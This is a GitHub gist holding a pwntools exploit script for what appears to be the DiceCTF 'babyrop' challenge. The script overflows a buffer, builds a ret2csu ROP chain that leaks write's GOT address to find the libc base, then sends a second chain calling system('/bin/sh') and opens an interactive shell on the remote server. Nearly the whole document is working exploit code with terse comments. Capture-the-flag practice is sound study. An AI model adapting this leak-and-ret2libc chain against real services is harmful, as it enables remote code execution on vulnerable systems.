Skip to content

Instantly share code, notes, and snippets.

@Adikso

Adikso/babyrop.py

Created February 8, 2021 00:15
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Adikso/7b0cd4aecc5639490461f85cfc5d8976 to your computer and use it in GitHub Desktop.
Save Adikso/7b0cd4aecc5639490461f85cfc5d8976 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
babyrop.py
from pwn import *
r = remote('dicec.tf', 31924)
elf = ELF('babyrop')
rop = ROP(elf)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_write = libc.symbols['write']
# Garbage
r.readuntil('Your name: ')
# Part 1 - Obtaining libc base address
got_write = elf.symbols['got.write']
payload = b'A' * 72
# pop rbx
# pop rbp
# pop r12
# pop r13
# pop r14
# pop r15
payload += p64(0x004011ca) # 'pop rbx', 'pop rbp', 'pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret'
payload += p64(0) # have to be zero for call address calculation
payload += p64(1) # new rbp
payload += p64(1) # r12 - stdin
payload += p64(got_write) # r13 - pointer
payload += p64(8) # r14 - count to write
payload += p64(got_write) # r15 - reloc.write
# mov rdx, r14
# mov rsi, r13
# mov edi, r12d
# call qword [r15 + rbx*8]
payload += p64(0x004011b0) # magic
# Fix rbp
payload += b'C' * 56
payload += p64(0x00401137) # second instruction of main
r.sendline(payload)
# Calculate libc address
address = u64(r.read(8))
libc.address = address - libc_write
log.info(f'Found write @ {hex(address)}')
log.info(f'Found libc base @ {hex(libc.address)}')
# Garbage
r.readuntil('Your name: ')
# # Part 2 - Execute shell
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
bin_sh = next(libc.search(b"/bin/sh\x00"))
system = libc.symbols['system']
payload = b'A' * 72
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
r.sendline(payload)
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment